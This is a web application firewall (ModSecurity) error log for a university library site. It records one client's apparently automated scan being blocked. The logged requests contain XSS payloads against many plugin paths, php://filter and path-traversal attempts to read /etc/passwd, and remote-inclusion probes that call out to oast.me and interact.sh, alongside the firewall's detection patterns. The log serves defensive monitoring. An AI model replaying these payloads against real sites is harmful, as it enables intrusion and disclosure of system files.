[Tue Aug 29 11:53:07.561468 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:profile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:profile: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/magmi/web/magmi.php"] [unique_id "ZO15s8Co-f0AAAor7owAAAAk"]
[Tue Aug 29 11:53:08.262818 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:p: \\x22;alert(document.domain);\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tMCo-f0AAAn402wAAAAW"]
[Tue Aug 29 11:53:08.303097 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAog@CAAAAAY"]
[Tue Aug 29 11:53:08.806518 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/admin/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAoAkwoAAAAC"]
[Tue Aug 29 11:53:09.573236 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keywords. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x0d*/ found within ARGS:keywords: <input/Autofocus/\\x0d*/Onfocus=alert(123);>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/tour-list/"] [unique_id "ZO15tcCo-f0AAAoLfQUAAAAG"]
[Tue Aug 29 11:53:10.417077 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:currentpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:currentpath: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tsCo-f0AAAoW7NQAAAAJ"]
[Tue Aug 29 11:53:11.805141 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0d\\x0a\\x0d\\x0a< found within ARGS:redirect: setting.htm\\x0d\\x0a\\x0d\\x0a<script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/man.cgi"] [unique_id "ZO15t8Co-f0AAAor7pcAAAAk"]
[Tue Aug 29 11:53:11.922966 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:gallery_current_index. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:gallery_current_index: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15t8Co-f0AAAoqbPYAAAAj"]
[Tue Aug 29 11:53:12.029533 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:customctid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:customctid: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/webadmin/policy/category_table_ajax.php"] [unique_id "ZO15uMCo-f0AAAoT7UoAAAAD"]
[Tue Aug 29 11:53:12.680758 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:FirstName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:FirstName: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/crm-perks-forms/templates/sample_file.php"] [unique_id "ZO15uMCo-f0AAAor7p0AAAAk"]
[Tue Aug 29 11:53:14.460419 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:Filename: Filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php"] [unique_id "ZO15usCo-f0AAAn403wAAAAW"]
[Tue Aug 29 11:53:14.634883 2023] [:error] [pid 2600] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/Images/Remote"] [unique_id "ZO15usCo-f0AAAoocxYAAAAh"]
[Tue Aug 29 11:53:15.767620 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO15u8Co-f0AAAoesMcAAAAV"]
[Tue Aug 29 11:53:16.558506 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);} found within ARGS:token: asdf\\x22);}alert(document.domain); function asdf() {//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/atutor/login.php"] [unique_id "ZO15vMCo-f0AAAn404IAAAAW"]
[Tue Aug 29 11:53:17.717286 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO15vcCo-f0AAAoLfRoAAAAG"]
[Tue Aug 29 11:53:18.717377 2023] [:error] [pid 2604] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php"] [unique_id "ZO15vsCo-f0AAAosCwYAAAAm"]
[Tue Aug 29 11:53:18.725439 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/dompdf.php"] [unique_id "ZO15vsCo-f0AAAni-C4AAAAU"]
[Tue Aug 29 11:53:19.851073 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"/><script>alert(1)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22/><script>alert(1)</script>: \\x22/><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15v8Co-f0AAAnTlcAAAAAA"]
[Tue Aug 29 11:53:19.941604 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/PhpSpreadsheet/Writer/PDF/DomPDF.php"] [unique_id "ZO15v8Co-f0AAAni-DMAAAAU"]
[Tue Aug 29 11:53:20.536971 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/lib/dompdf/dompdf.php"] [unique_id "ZO15wMCo-f0AAAot8OoAAAAn"]
[Tue Aug 29 11:53:21.675278 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/includes/dompdf/dompdf.php"] [unique_id "ZO15wcCo-f0AAAowNoQAAAAH"]
[Tue Aug 29 11:53:22.533447 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15wsCo-f0AAAoT7W8AAAAD"]
[Tue Aug 29 11:53:23.313650 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:movie_param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:movie_param: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/avchat-3/index_popup.php"] [unique_id "ZO15w8Co-f0AAAoT7XIAAAAD"]
[Tue Aug 29 11:53:23.907742 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "ZO15w8Co-f0AAAoAkzgAAAAC"]
[Tue Aug 29 11:53:24.753064 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php"] [unique_id "ZO15xMCo-f0AAAolKWYAAAAe"]
[Tue Aug 29 11:53:24.769159 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]: urls[<img src=x onerror=alert(document.domain)>]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15xMCo-f0AAAoW7PwAAAAJ"]
[Tue Aug 29 11:53:25.672576 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php"] [unique_id "ZO15xcCo-f0AAAor7sAAAAAk"]
[Tue Aug 29 11:53:25.850868 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:query: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/search"] [unique_id "ZO15xcCo-f0AAAowNo8AAAAH"]
